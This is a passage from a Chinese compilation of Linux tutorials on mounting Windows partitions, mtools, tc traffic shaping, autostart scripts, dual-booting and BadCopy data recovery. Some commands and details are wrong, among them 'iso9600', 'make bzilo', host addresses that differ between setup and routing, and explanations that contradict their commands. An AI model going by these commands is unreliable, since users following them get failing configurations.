    在/mnt目录下为之创建一个目录winc（winc以及其他的装载目录是笔者的假设，你可以用自己喜欢的其他合法字符去命名这些目录）：
    mkdir /mnt/winc
    用装载指令将C盘内容装载入该目录：
    mount －t vfat /dev/hda1 /mnt/winc
    3．装载光盘
    在/mnt目录下为你的光盘驱动器创建一个目录cdrom（有的Linux系统安装时已为你完成了这件事）：
    mkdir /mnt/cdrom
    如果你的光盘驱动器安装在primary slave上，设备文件名就是/dev/hdb；如果安装在secondary master上，设备文件名就是/dev/hdc。假设你的光盘驱动器挂在secondary master，就用下面的装载指令：
    mount －t iso9600 /dev/hdc /mnt/cdrom
    由于Linux版本的不同，你所用的系统或者会使用这样的指令来装载光盘：
    mount /dev/cdrom
    或mount /mnt/cdrom
    二、卸载（umount）
    如果你已经用指令将软盘装载进相应目录，就不要直接将它们从软驱中取出来，否则可能会导致信息丢失；已经装载的光盘驱动器更是会令面板上的弹出键暂时失效以阻止你将光盘直接取出。
    在你取出它们之前，首先要确定已经没有用户对它们进行访问操作，包括没有工作窗口处在该磁盘驱动器被装载的目录。卸载指令的格式如下：
    umount 卸载目录名
    如用户想要卸载软盘，可以用如下指令：
    umount /mnt/floppy
    三、进阶使用
    （一）为装载指令增加简捷的形式
    用户可以在系统的配置文件/etc/fstab中指定一些常用的需要装载的驱动器，以便用更简捷的指令来装载它们，下面给出一个添加Windows系统的C盘进配置文件的例子：用文件编辑工具vi（也可以用其它你熟悉的文件编辑工具）打开/etc/fstab，我们会看到系统已经为根目录“/”、软磁盘驱动器、光盘驱动器等指定了文件系统类型和设备文件名以及装载目录（可能会因为所用的Linux版本不同，被指定的驱动器会有出入，不过用户可以参照下面的例子做出改动）。你既可以改变它们的预设值，也可以在其中添加新的驱动器。用箭头将光标移到最后一行，将下面一行加入文件：
    /dev/hda1 /mnt/winc vfat defaults 0 0
    如果还想装载硬盘内的其它分区，可以依次加入。完成后保存文件并退出。不要忘记相应的创建目录/mnt/winc。此后你就可以用如下指令装载Windows系统的C盘了：
    mount /mnt/winc
    （二）启动时自动装载磁盘驱动器
    用户可能会希望系统在启动时可以将你惯用的磁盘驱动器（如硬盘中的Windows分区或者是光盘驱动器）自动装载，以减轻每次启动后都要手动装载的麻烦。你可以用以下方法实现自动装载的功能：
    用文件编辑工具打开/etc/fstab，将刚才我们加入的那一行中的defaults改成auto，如：
    /dev/hda1 /mnt/winc vfat auto 0 0
    对于其它想在启动时就装载的磁盘驱动器，都可以将defaults改成auto。需要注意的是，对于硬盘上的Linux分区（包括ext2和swap）并不需要作出这样的改动。
    重新启动系统以后，在/mnt/winc目录下，你就可以看到系统在启动时就装载好的Windows系统的C盘了。
    四、使用Mtools
    在Linux中想要共享Windows系统资源，除了上面介绍的装载（mount）命令之外，还有一组名为Mtools的软件包可以实现这一功能。和大多数实用工具一样，Mtools软件包亦是Linux系统默认的安装套件。你可以在http://mtools.ltnb.lu/下载到它的最新版本mtools－3.9.7.tar.gz。
    （一）Mtools命令
    对于熟悉DOS命令的用户来说，Mtools命令会让他们感觉到像回到了DOS的世界。在下面的^35020202c^表格中我们可以看出它们有多么相似：
    很显然，Mtools命令是简单地在DOS命令前加上了一个m前缀，功能还是和在DOS下一样的。须要注意的是，更改目录路径在DOS命令中可以有cd和chdir两种命令格式，但是在Mtools中只有mcd一种格式。类似的在Mtools中没有对应的命令还有mkdir、rmdir、rename等等。
    （二）mtools.conf文档的配置
    因为Mtools是一个仿真DOS命令的软件包，所以它也保存着DOS系统下的磁盘驱动器概念。Mtools不但可以实现A盘 、B盘、 C盘的概念，对于一些特殊驱动器（如ZIP驱动器）更有专门的命令（mzip）以让用户方便地进行操作。在默认的环境下，A盘和B盘分别对应着两个软盘驱动器（如果有的话），N盘则对应着DOSMU启动盘的镜像文件。
    我们可以通过修改/etc/mtools.conf文档来改变默认的配置，当然在做出修改之前你仍要对Linux下的设备文件名有相当的认识才行（请参考上一期本版有关设备及其文件名的介绍）。假设你的机器有一个1.44MB软驱（A），硬盘挂在第一个IDE接口的主位置上，在第一个分区（C盘）中安装有Windows操作系统，光驱挂在第二个IDE接口的主位置上（D盘），以及SCSI盘等，则可以对mtools.conf文档简单配置如下：
    mtools.conf
    drive a: file=″/dev/fd0″ exclusive 1.44m
    drive c: file=″/dev/hda1″
    drive d: file=″/dev/hdc″
    drive X: file=″/dev/rdsk/c0t5d0s2″ partition=4 scsi=1 nodelay
    （三）Mtools命令的使用
    Mtools的命令系统和DOS有很多相似之处，比如在命令后面可以加不同的参数以实现更为丰富的功能（Mtools命令的参数使用方法是在命令后面加“－<参数>”，你可以把它想象成用“－”代替了DOS命令使用的“/”），可以使用通配符“?”和“＊”。更为方便的是，使用Mtools不需要事先装载（mount）和事后卸载（umount）。
    下面我们以目录列表命令mdir为例作说明（想知道其它命令的使用格式和更多的可用参数可以用man 命令查看相关帮助系统）。mdir的功能是对DOS目录和其中的文档进行列表操作。命令格式如下：
    mdir [－/] [－f] [－w] [－a] [－X] msdosfile [msdosfile]
    各命令参数的功能分述如下：
    /：输出当前路径下的所有目录和文档，相当于DOS命令dir中的“s”参数；
    f：列表时不尝试计算当前分区的自由空间，对于大硬盘来说，这样做可以节省一些读入和扫描分区表（FAT）的时间；
    w：列表时在一行中显示多个目录文档，这种输出格式将不显示文档的大小和创建时间，相当于DOS命令dir中的“w”参数；
    a：列出隐藏的目录文档；
    X：简要列表，列出路径名而不列出其它附加的信息。
    一些具体的应用实例：
    1．列表A盘下的所有目录文档（不包括隐藏的目录文档）
    mdir －/ a:
    2．列表C盘Windows目录下含有“abc”的目录文档
    mdir c:/windows/＊abc＊
    或者mdir c:\windows\＊Abc＊
    注：在Mtools命令中，/和\是可以混用的。又因为列表的是DOS系统下的文档，对大小写并不敏感，所以“abc”和“Abc”在这里是等价的。而通配符“＊”的用法和DOS命令亦有所不同。
    五、在Windows系统中共享Linux系统的文档
    无论对于刚接触Linux的新手还是对之已经熟悉的高手，恐怕都免不了想在Windows系统中调阅Linux系统的文档。这可以使用在Windows系统下观看Linux分区的小软件（如fsdext2等）。这里再向各位推荐两种可以实现这种功能的小软件。
    （一）Linuxindos
    Linuxindos是一个不到500KB的小程序，笔者找到的版本是Beta 0.9的DEMO版，用户可以在http://best.163.com/～linux/soft/下载试用。程序不需安装就可以在Windows系统下运行，使用也非常简单。
    在Windows系统下将linuxindos.zip解压到硬盘目录，用户就会看到一个带着企鹅图标的可执行程序LiD95Demo.exe。启动程序后，会出现一个接口非常简单的窗口，当用户挑选一个含有Linux系统文档的磁盘驱动器以后，Linux分区中的所有文档就会显示出来，左边窗口列出的是Linux分区中的目录，而右窗口就列出了目录内的文档，感觉就像在Windows的资源管理器中一样。
    （二）Explore2fs
    这是一个更为小巧的自由软件，大小约308KB，用户也可以在http://best.163.com/～linux/soft/下载使用。正如它的名字一样，这是一个有着类似资源管理器窗口的程序，通过它你可以读取Linux系统下的分区。和Linuxindos一样，Explore2fs的主视窗亦分为左右两个，左边显示的是Linux中的目录，而右边显示的就是目录中的文档了，可以简单地将右边视窗中的文档直接拖到Windows系统分区中。
    在右边视窗中选择好文档后，按下鼠标右键可以选择相应的操作，“Export file”是直接导出文档，而“Export to Text”则是除去文档的分隔符后导出和TEXT兼容的文本文档。


在LINUX中实现流量控制器

《一键清理系统垃圾》

在LINUX中实现流量控制器

    Linux从kernel 2.1.105开始支持QOS，不过，需要重新编译内核。运行 'make config'时将 EXPERIMENTAL　_OPTIONS 设置成 'y'，并且将 Class Based Queueing (CBQ), Token Bucket Flow, Traffic Shapers 设置为 'y' ，运行 'make dep; make clean; make bzilo'，生成新的内核。
    在Linux操作系统中流量控制器(TC)主要是在输出端口处建立一个队列进行流量控制，控制的方式是基于路由，亦即基于目的IP地址或目的子网的网络号的流量控制。流量控制器TC，其基本的功能模块为队列、分类和过滤器。Linux内核中支持的队列有，Class Based Queue ，Token Bucket Flow ，CSZ ，First In First Out ，Priority ，TEQL ，SFQ ，ATM ，RED。这里我们讨论的队列与分类都是基于CBQ(Class Based Queue)的，而过滤器是基于路由(Route)的。
    配置和使用流量控制器TC，主要分以下几个方面：分别为建立队列、建立分类、建立过滤器和建立路由，另外还需要对现有的队列、分类、过滤器和路由进行监视。

    其基本使用步骤为：
    1) 针对网络物理设备(如以太网卡eth0)绑定一个CBQ队列；
    2) 在该队列上建立分类；
    3) 为每一分类建立一个基于路由的过滤器；
    4) 最后与过滤器相配合，建立特定的路由表。

先假设一个简单的环境，如下图所示：

    流量控制器上的以太网卡(eth0) 的IP地址为192.168.1.66，在其上建立一个CBQ队列。假设包的平均大小为1000字节，包间隔发送单元的大小为8字节，可接收冲突的发送最长包数目为20字节。
    假如有三种类型的流量需要控制:
    1) 是发往主机1的，其IP地址为192.168.1.24。其流量带宽控制在8Mbit，优先级为2；
    2) 是发往主机2的，其IP地址为192.168.1.26。其流量带宽控制在1Mbit，优先级为1；
    3) 是发往子网1的，其子网号为192.168.1.0，子网掩码为255.255.255.0。流量带宽控制在1Mbit，优先级为6。

1. 建立队列
    一般情况下，针对一个网卡只需建立一个队列。

    将一个cbq队列绑定到网络物理设备eth0上，其编号为1:0；网络物理设备eth0的实际带宽为10 Mbit，包的平均大小为1000字节；包间隔发送单元的大小为8字节，最小传输包大小为64字节。
    ·tc qdisc add dev eth0 root handle 1: cbq bandwidth 10Mbit avpkt 1000 cell 8 mpu 64

2. 建立分类
    分类建立在队列之上。一般情况下，针对一个队列需建立一个根分类，然后再在其上建立子分类。对于分类，按其分类的编号顺序起作用，编号小的优先；一旦符合某个分类匹配规则，通过该分类发送数据包，则其后的分类不再起作用。

1） 创建根分类1:1；分配带宽为10Mbit，优先级别为8。
·tc class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 10Mbit rate 10Mbit maxburst 20 allot 1514 prio 8 avpkt 1000 cell 8 weight 1Mbit

    该队列的最大可用带宽为10Mbit，实际分配的带宽为10Mbit，可接收冲突的发送最长包数目为20字节；最大传输单元加MAC头的大小为1514字节，优先级别为8，包的平均大小为1000字节，包间隔发送单元的大小为8字节，相应于实际带宽的加权速率为1Mbit。

2）创建分类1:2，其父分类为1:1，分配带宽为8Mbit，优先级别为2。
·tc class add dev eth0 parent 1:1 classid 1:2 cbq bandwidth 10Mbit rate 8Mbit maxburst 20 allot 1514 prio 2 avpkt 1000 cell 8 weight 800Kbit split 1:0 bounded

    该队列的最大可用带宽为10Mbit，实际分配的带宽为 8Mbit，可接收冲突的发送最长包数目为20字节；最大传输单元加MAC头的大小为1514字节，优先级别为1，包的平均大小为1000字节，包间隔发送单元的大小为8字节，相应于实际带宽的加权速率为800Kbit，分类的分离点为1:0，且不可借用未使用带宽。

3）创建分类1:3，其父分类为1:1，分配带宽为1Mbit，优先级别为1。
·tc class add dev eth0 parent 1:1 classid 1:3 cbq bandwidth 10Mbit rate 1Mbit maxburst 20 allot 1514 prio 1 avpkt 1000 cell 8 weight 100Kbit split 1:0

    该队列的最大可用带宽为10Mbit，实际分配的带宽为 1Mbit，可接收冲突的发送最长包数目为20字节；最大传输单元加MAC头的大小为1514字节，优先级别为2，包的平均大小为1000字节，包间隔发送单元的大小为8字节，相应于实际带宽的加权速率为100Kbit，分类的分离点为1:0。

4）创建分类1:4，其父分类为1:1，分配带宽为1Mbit，优先级别为6。
·tc class add dev eth0 parent 1:1 classid 1:4 cbq bandwidth 10Mbit rate 1Mbit maxburst 20 allot 1514 prio 6 avpkt 1000 cell 8 weight 100Kbit split 1:0

    该队列的最大可用带宽为10Mbit，实际分配的带宽为 64Kbit，可接收冲突的发送最长包数目为20字节；最大传输单元加MAC头的大小为1514字节，优先级别为1，包的平均大小为1000字节，包间隔发送单元的大小为8字节，相应于实际带宽的加权速率为100Kbit，分类的分离点为1:0。

3. 建立过滤器
过滤器主要服务于分类。一般只需针对根分类提供一个过滤器，然后为每个子分类提供路由映射。

1） 应用路由分类器到cbq队列的根，父分类编号为1:0；过滤协议为ip，优先级别为100，过滤器为基于路由表。
·tc filter add dev eth0 parent 1:0 protocol ip prio 100 route

2） 建立路由映射分类1:2, 1:3, 1:4
·tc filter add dev eth0 parent 1:0 protocol ip prio 100 route to 2 flowid 1:2
·tc filter add dev eth0 parent 1:0 protocol ip prio 100 route to 3 flowid 1:3
·tc filter add dev eth0 parent 1:0 protocol ip prio 100 route to 4 flowid 1:4

4.建立路由
该路由是与前面所建立的路由映射一一对应。
1） 发往主机192.168.1.24的数据包通过分类2转发(分类2的速率8Mbit)
·ip route add 192.168.1.24 dev eth0 via 192.168.1.66 realm 2

2） 发往主机192.168.1.30的数据包通过分类3转发(分类3的速率1Mbit)
·ip route add 192.168.1.30 dev eth0 via 192.168.1.66 realm 3

3）发往子网192.168.1.0/24的数据包通过分类4转发(分类4的速率1Mbit)
·ip route add 192.168.1.0/24 dev eth0 via 192.168.1.66 realm 4

    注：一般对于流量控制器所直接连接的网段建议使用IP主机地址流量控制限制，不要使用子网流量控制限制。如一定需要对直连子网使用子网流量控制限制，则在建立该子网的路由映射前，需将原先由系统建立的路由删除，才可完成相应步骤。

5. 监视
    主要包括对现有队列、分类、过滤器和路由的状况进行监视。
1）显示队列的状况

简单显示指定设备(这里为eth0)的队列状况
·tc qdisc ls dev eth0
qdisc cbq 1: rate 10Mbit (bounded,isolated) prio no-transmit

详细显示指定设备(这里为eth0)的队列状况
·tc -s qdisc ls dev eth0
qdisc cbq 1: rate 10Mbit (bounded,isolated) prio no-transmit
Sent 7646731 bytes 13232 pkts (dropped 0, overlimits 0)
borrowed 0 overactions 0 avgidle 31 undertime 0

    这里主要显示了通过该队列发送了13232个数据包，数据流量为7646731个字节，丢弃的包数目为0，超过速率限制的包数目为0。

2）显示分类的状况

简单显示指定设备(这里为eth0)的分类状况
·tc class ls dev eth0
class cbq 1: root rate 10Mbit (bounded,isolated) prio no-transmit
class cbq 1:1 parent 1: rate 10Mbit prio no-transmit #no-transmit表示优先级为8
class cbq 1:2 parent 1:1 rate 8Mbit prio 2
class cbq 1:3 parent 1:1 rate 1Mbit prio 1
class cbq 1:4 parent 1:1 rate 1Mbit prio 6

详细显示指定设备(这里为eth0)的分类状况
·tc -s class ls dev eth0
class cbq 1: root rate 10Mbit (bounded,isolated) prio no-transmit
Sent 17725304 bytes 32088 pkts (dropped 0, overlimits 0)
borrowed 0 overactions 0 avgidle 31 undertime 0
class cbq 1:1 parent 1: rate 10Mbit prio no-transmit
Sent 16627774 bytes 28884 pkts (dropped 0, overlimits 0)
borrowed 16163 overactions 0 avgidle 587 undertime 0
class cbq 1:2 parent 1:1 rate 8Mbit prio 2
Sent 628829 bytes 3130 pkts (dropped 0, overlimits 0)
borrowed 0 overactions 0 avgidle 4137 undertime 0
class cbq 1:3 parent 1:1 rate 1Mbit prio 1
Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
borrowed 0 overactions 0 avgidle 159654 undertime 0
class cbq 1:4 parent 1:1 rate 1Mbit prio 6
Sent 5552879 bytes 8076 pkts (dropped 0, overlimits 0)
borrowed 3797 overactions 0 avgidle 159557 undertime 0

    这里主要显示了通过不同分类发送的数据包，数据流量，丢弃的包数目，超过速率限制的包数目等等。其中根分类(class cbq 1:0)的状况应与队列的状况类似。
    例如，分类class cbq 1:4发送了8076个数据包，数据流量为5552879个字节，丢弃的包数目为0，超过速率限制的包数目为0。

显示过滤器的状况
·tc -s filter ls dev eth0
filter parent 1: protocol ip pref 100 route
filter parent 1: protocol ip pref 100 route fh 0xffff0002 flowid 1:2 to 2
filter parent 1: protocol ip pref 100 route fh 0xffff0003 flowid 1:3 to 3
filter parent 1: protocol ip pref 100 route fh 0xffff0004 flowid 1:4 to 4

这里flowid 1:2代表分类class cbq 1:2，to 2代表通过路由2发送。

显示现有路由的状况
·ip route
192.168.1.66 dev eth0 scope link
192.168.1.24 via 192.168.1.66 dev eth0 realm 2
202.102.24.216 dev ppp0 proto kernel scope link src 202.102.76.5
192.168.1.30 via 192.168.1.66 dev eth0 realm 3
192.168.1.0/24 via 192.168.1.66 dev eth0 realm 4
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.66
172.16.1.0/24 via 192.168.1.66 dev eth0 scope link
127.0.0.0/8 dev lo scope link
default via 202.102.24.216 dev ppp0
default via 192.168.1.254 dev eth0

    如上所示，结尾包含有realm的显示行是起作用的路由过滤器。

6. 维护
    主要包括对队列、分类、过滤器和路由的增添、修改和删除。
    增添动作一般依照"队列->分类->过滤器->路由"的顺序进行；修改动作则没有什么要求；删除则依照"路由->过滤器->分类->队列"的顺序进行。

1）队列的维护
一般对于一台流量控制器来说，出厂时针对每个以太网卡均已配置好一个队列了，通常情况下对队列无需进行增添、修改和删除动作了。

2）分类的维护

增添
增添动作通过tc class add命令实现，如前面所示。

修改
修改动作通过tc class change命令实现，如下所示：
·tc class change dev eth0 parent 1:1 classid 1:2 cbq bandwidth 10Mbit rate 7Mbit maxburst 20 allot 1514 prio 2 avpkt 1000 cell 8 weight 700Kbit split 1:0 bounded
对于bounded命令应慎用，一旦添加后就进行修改，只可通过删除后再添加来实现。

删除
删除动作只在该分类没有工作前才可进行，一旦通过该分类发送过数据，则无法删除它了。因此，需要通过shell文件方式来修改，通过重新启动来完成删除动作。

3）过滤器的维护

增添
增添动作通过tc filter add命令实现，如前面所示。

修改
修改动作通过tc filter change命令实现，如下所示：
·tc filter change dev eth0 parent 1:0 protocol ip prio 100 route to 10 flowid 1:8

删除
删除动作通过tc filter del命令实现，如下所示：
·tc filter del dev eth0 parent 1:0 protocol ip prio 100 route to 10

4）与过滤器一一映射路由的维护

增添
增添动作通过ip route add命令实现，如前面所示。

修改
修改动作通过ip route change命令实现，如下所示：
·ip route change 192.168.1.30 dev eth0 via 192.168.1.66 realm 8

删除
删除动作通过ip route del命令实现，如下所示：
·ip route del 192.168.1.30 dev eth0 via 192.168.1.66 realm 8
·ip route del 192.168.1.0/24 dev eth0 via 192.168.1.66 realm 4

返回


在Red Hat Linux 中自动运行程序

《一键清理系统垃圾》

在Red Hat Linux 中自动运行程序

    1．开机启动时自动运行程序
    Linux加载后， 它将初始化硬件和设备驱动， 然后运行第一个进程init。init根据配置文件继续引导过程，启动其它进程。通常情况下，修改放置在 /etc/rc或 /etc/rc.d 或 /etc/rc?.d 目录下的脚本文件，可以使init自动启动其它程序。例如：编辑 /etc/rc.d/rc.local 文件，在文件最末加上一行“xinit”或“startx”，可以在开机启动后直接进入X－Window。
    2．登录时自动运行程序
    用户登录时，bash首先自动执行系统管理员建立的全局登录script ：/ect/profile。然后bash在用户起始目录下按顺序查找三个特殊文件中的一个：/.bash_profile、/.bash_login、/.profile，但只执行最先找到的一个。
    因此，只需根据实际需要在上述文件中加入命令就可以实现用户登录时自动运行某些程序（类似于DOS下的Autoexec.bat）。
    3．退出登录时自动运行程序
    退出登录时，bash自动执行个人的退出登录脚本/.bash_logout。例如，在/.bash_logout中加入命令“tar －cvzf c.source.tgz ＊.c”，则在每次退出登录时自动执行 “tar” 命令备份 ＊.c 文件。
    4．定期自动运行程序
    Linux有一个称为crond的守护程序，主要功能是周期性地检查 /var/spool/cron目录下的一组命令文件的内容，并在设定的时间执行这些文件中的命令。用户可以通过crontab 命令来建立、修改、删除这些命令文件。
    例如，建立文件crondFile，内容为“00 9 23 Jan ＊ HappyBirthday”，运行“crontab cronFile”命令后，每当元月23日上午9:00系统自动执行“HappyBirthday”的程序（“＊”表示不管当天是星期几）。
    5．定时自动运行程序一次
    定时执行命令at 与crond 类似（但它只执行一次）：命令在给定的时间执行，但不自动重复。at命令的一般格式为：at [ －f　file ] time，在指定的时间执行file文件中所给出的所有命令。也可直接从键盘输入命令：
    ＄ at 12:00
    at>mailto Roger －s ″Have a lunch″ < plan.txt
    at>Ctr－D
    Job 1 at 2000－11－09 12:00
    2000－11－09 12:00时候自动发一标题为“Have a lunch”，内容为plan.txt文件内容的邮件给Roger。


在第二硬盘上安装Linux

《一键清理系统垃圾》

返回总目录 上一页 目录页

在第二硬盘上安装Linux

    在主硬盘空间不足或不想更改硬盘分区的情况下，我们都很想把Linux安装到第二个硬盘上。一般而言，安装Linux时，系统如果不安装在主硬盘上，就需要做一些特殊的工作。这里介绍一个仅使用LILO启动器就可以让原来主硬盘上的Win98和第二硬盘上的Linux“和平共处”的方法。
    以我的系统为例，硬件配置和软件环境如下：
    赛扬400/钻石I810主板/64MB内存/15英寸彩显/40×光驱/双硬盘。
    硬盘一：希捷8.4GB全部空间已经分成FAT32分区，安装了Win98操作系统。
    硬盘二：希捷3.2GB前500MB空间已经分为FAT32分区，剩余为自由空间。
    软件：RedHat 6.0
    需要达到的要求：Linux安装在二号硬盘，机器从一号硬盘启动（主盘），启动时可以自由切换选择操作系统Win98和Linux。
    下面是安装步骤：
    1.准备工作
    打开机箱，把一号硬盘的硬盘线拔下来。（必须拔下来，因为即使在BIOS里面把主硬盘屏蔽掉，Linux照样可以发现它，这样将造成安装失败）配置好机器，在BIOS里面设置成光盘首先启动。
    2.第一次安装
    由光盘启动，在二号硬盘上安装Linux。如果二号硬盘和一号硬盘共用数据线，且使用主板的IDE1接口，那么在安装时，硬盘将被认成“hdb”。如二号硬盘和光驱共用数据线，且使用主板的IDE2接口，硬盘可能就会被认成“hdc”。
    需要注意的是，在安装LILO时，不能把它安装在“Master Boot Record”，必须安装在“First Sector of Boot Partition”。目的是为了将来由主盘上的LILO调用二号硬盘的Linux分区启动指令。
    安装完成后，关闭计算机电源。这时是启动不了硬盘上的Linux的。如果强行启动，就会出现死循环或者死机状态。
    3.设置LILO
    重新接好一号硬盘，仍然由光盘启动计算机。这时，在安装Linux时，在出现的“install”、“upgrade”选项里面选择后者。其实就是为了在一号硬盘重新安装LILO，让其调用已经设置好的Linux启动分区。
    在安装LILO时，会出现一号硬盘的标识“hda”。
    /dev/hda Master Boot Record
    ……
    这次要把LILO安装在hda的主引导记录Master Boot Record上。完成此步后，会出现启动设置的选项。机器把主硬盘上的Win98和刚才安装的Linux罗列出来，要求你选择可以启动的系统，把其他一些选项配置好后完成安装。至此，大功告成。
    编后：此法特别适合Linux初学者，因为用这种方法安装的Linux和Win98彼此隔离开来，非常便于对各个系统的维护。以后，如果第一硬盘上的Win98崩溃，格式化C盘重装后，可以再重装LILO恢复双启动；如果第二硬盘上的Linux崩溃，可以用Win98启动盘引导系统后再执行fdisk /mbr命令重写主引导记录，即可轻松去除LILO，令第一硬盘上的Win98系统完好无损。


Linux

《一键清理系统垃圾》

返回总目录

Linux

◎Linux操作系统12则经典应用技巧
◎Linux常见故障的紧急处理方法
◎Linux带你轻松上网
◎Linux的目录里都装些啥
◎Linux各个发行版本的选择
◎Linux环境下Oracle的安装与配置
◎Linux环境下无盘工作站的架设和实现
◎Linux内核解读入门
◎Linux巧变PC为路由器
◎Linux日志管理详解(上）
◎Linux日志管理详解（下）
◎Linux使用小经验十则
◎Linux系统常见6种紧急情况处理方法
◎Linux下的文字处理
◎Linux下软件的基本安装和卸载
◎Linux中IP隧道的分析与建议
◎LynxOS、QNX、Linux的分析和比较
◎Red Hat组建局域网完全手册（上）
◎Red Hat组建局域网完全手册（下）
◎Red Hat组建局域网完全手册（中）
◎安装 Linux 无盘工作站
◎从DOS启动TurboLinux
◎对照DOS学Linux的基本命令
◎构建DNS服务器简易指南
◎基于Linux的路由器和防火墙配置
◎如何设置一个高容量的Linux POP3服务器
◎如何实现Linux与Win 9x互操作
◎如何在Linux下实现设备的配置（上）
◎如何在Linux下实现设备的配置（下）
◎什么是Linux
◎忘记Linux密码的解决办法
◎忘记Linux密码怎么办
◎用Linux建立局域网服务器
◎用好Linux的启动盘
◎在Linux下安装声卡
◎在Linux下安装显卡驱动程序
◎在Linux下配置网卡
◎在Linux中安装应用软件
◎在Linux中共享Windows系统资源
◎在LINUX中实现流量控制器
◎在Red Hat Linux 中自动运行程序
◎在第二硬盘上安装Linux

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


4.2.4常见存储介质的修复CD、CD-R、CD-RW、U盘和数码相机内存卡的修复

《一键清理系统垃圾》

返回总目录 目录页 下一页

4.2.4常见存储介质的修复CD、CD-R、CD-RW、U盘和数码相机内存卡的修复

这里所说的保存介质是指便携式的保存介质，例如我们常说的光盘，CD、CD-R、CD-RW，还有U盘，以及使用比较多的数码相机的内存卡，这些在我们日常的工作中使用频率比较高，因此，一旦出现问题，就会有数据丢失，无法挽回，造成损失。这往往是让人非常心痛的。其实，对于这些无法读取的重要的数据，并非完全无无能为力，借助第三方软件，我们是可以发挥“回天之力”的。

一）故障出现的主要原因

在介绍如何挽回数据之前，我们先分析一下对于上述的几种存储介质而言，如果出现数据无法读取，都有哪些主要的原因。

1. CD、CD-R、CD-RW

光盘的数据和文件读取不出来，或者光盘已经不能被识别，排除是因为某些光驱对盘片比较“挑剔”的原因以外，有几个主要的原因：

1）光盘的表面有污渍

当光盘沾染到一些污渍，例如灰尘、油渍等等，光盘内的文件就有可能无法读取。用专门的无尘纸擦拭就可以解决，如果污渍比较顽固，可以稍微站一点酒精进行擦拭。而平时清洁所用的一些洗涤剂是不可以用的，它们内含酸或者是碱性物质，对于光盘的表面有腐蚀作用，会更加深光盘的损害。

2）光盘有损伤

这可能是非常常见的原因，而且通常比较明显，有时候在光盘表面就可以看到有划痕和刮伤。

3）光驱温度过高

如果你的光盘在刚刚开始用的时候可以读取，使用正常，而在连续使用一段时间以后却无法读取光盘了，有可能是因为光驱在连续工作以后温度过高，以致无法读取光盘。

4）光驱的读写头脏了

使用一段时间以后，光驱的读写头有可能脏了，也会造成无法读取光驱。读写头因为在光驱的内部，不好作清洁，只有把光驱的外壳拆下来，用棉签站酒精擦拭读写头。反复多擦几次，会有效果。

2. U盘和USB设备

自从1998年USB接口出现以来，非常迅速地普及开来，几乎所有的新的机型都配备了USB接口。尤其是在U盘或者称为闪盘以其体积小、携带方便，而且它128MB或者256MB的容量，也能够满足日常操作的需要。因此迅速成为存储介质的主流，取代了ZIP盘和很多以前出现的类似存储介质。尽管　　　 U盘的可靠性比较高，但是有时也会出现无法读取的情况。如果出现这种情况，排除没有插好的情况以外，主要的原因有几个：

1）没有安装或者安装了不正确的驱动程序。对于Windows 而言，不同版本会存在一些差异，对于Wiindows ME、Wiindows 2000/XP来说，系统一般都带有相应的驱动程序，因此可以放心使用，而Wiindows 98的兼容性差一些，需要使用U盘自己带的驱动程序，才可能正常使用。如果是这种情况，表现为系统显示没有找到U盘。

2）USB端口出现了问题，虽然这种几率不太高，但还是有可能的，可以换一个端口试试。

3）U盘或者文件有部分损坏，无法读取文件。

3. 数码相机的内存卡

数码相机获得越来越多的人的青睐，因此如果数码相机出了问题，可是会损失多多，那么多美好的瞬间就会稍纵即逝。所以数码相机的内存卡一定要妥善保管。内存卡现在很多，不管是CompactFlash卡，还是MemoryFlash卡，或者是SmartMedia卡，都需要提过计算机处理保存，因此，在读入过程中就可能出现无法读取的情况。如果出现这种情况，可能的原因和U盘一样：驱动程序不正确或者没有安装，USB端口有问题，或者是内存卡或者损坏。

在发现文件无法读取以后，要先确定一个问题，是存储介质出现问题还是文件被损坏了？如果介质上的文件还能够复制到其他存储介质上，只是文件无法打开，那么说明是文件受到损坏，如果文件不能打开，也不能复制到别处，则说明有可能是存储介质被损坏，出了问题。所以第一步，要迅速确定你面临的问题是下面两种情况中的哪一种。

1.　　修复受到损坏或者被删除的文件

2.　　修复受到损坏的介质中的文件

二）修复文件和存储介质

正如前面所述，要解决上面的问题，仅仅靠系统自身提供的工具是无法完全解决的，在这里，我们推荐一个第三方软件，BadCopy pro 3.75。这个软件是一个使用简单、功能强劲的数据修复工具，它可以恢复多种存储介质中的数据，包括软盘、光盘、USB、ZIP盘、数码相机的CF卡等等。

下面我们按照前面说的两种情况来一步一步来操作。

1. 文件已经被删除或者光盘被严重损坏已经完全不可读

采用BadCopy的恢复模式：Rescue Lost Files－Mode #2

首先，运行BadCopy。

1）出现第一个窗口，图7-2-1 。在窗口左边是软件可以修复的介质的类型，我们选择CD-ROM,CD-R/W；选择要进行修复的光驱所在的盘符；在修复模式recovery Mode一栏选择“Rescue Lost Files－Mode #2”单击“next”。

    图7-2-1 BadCopy的主窗口

如果是数码相机内存卡，存储介质选择“Digital Media CF/SM/MMC”。

如果是U盘，存储介质选择“Other Media &Storage”，然后在盘符中选择U盘所在的盘符。这种方法也可以用于挽回其它盘符如硬盘中的数据。

2）出现第二个窗口，图7-2-2。说明修复回来的文件会暂时命名为file1，file2等。可以在保存的时候另外命名。同时说明，除了你希望恢复的文件，可能还会有另外的文件被恢复，包括已经被删除的文件。单击“OK”。

   图7-2-2 修复模式的说明

3）出现第三个窗口，单击“start”开始恢复文件。

4）出现第四个窗口，如图7-2-3。单击“scan range”选项，勾选“Full scan”全面扫描，单击“start”。

   图 7-2-3 扫描文件

5）出现第五个窗口，如图7-2-4。开始察看已经被删除的文件。被找到文件显示在中间的文件框内。完成后单击“next”。

   图 7-2-4　显示被挽回的文件列表

6）出现第六个窗口，如图7-2-5，Recovery Reprot一栏中列出已经被恢复的文件，选择其中的某一个文件，按下“Browse”按钮，选择一个盘符和文件夹将挽救回来的文件保存到该处。单击“next”。

   图7-2-5 选择文件夹保存被修复的文件

7）出现第七个窗口，如图7-2-6，开始保存，如果是试用版，则无法保存，很遗憾！保存结束，关闭窗口。

    图7-2-6 保存文件

几个注意事项：

有可能希望挽回的被删除文件已经被之后新复制的文件覆盖，这样便无法恢复。

Badcopy不能完全识别所有文件的类型和格式，因此可能出现将这些文件视为EXE文件的可能。

2. 修复受到损坏的介质中的文件

这次我们以U盘作为例子介绍。首先，运行BadCopy。

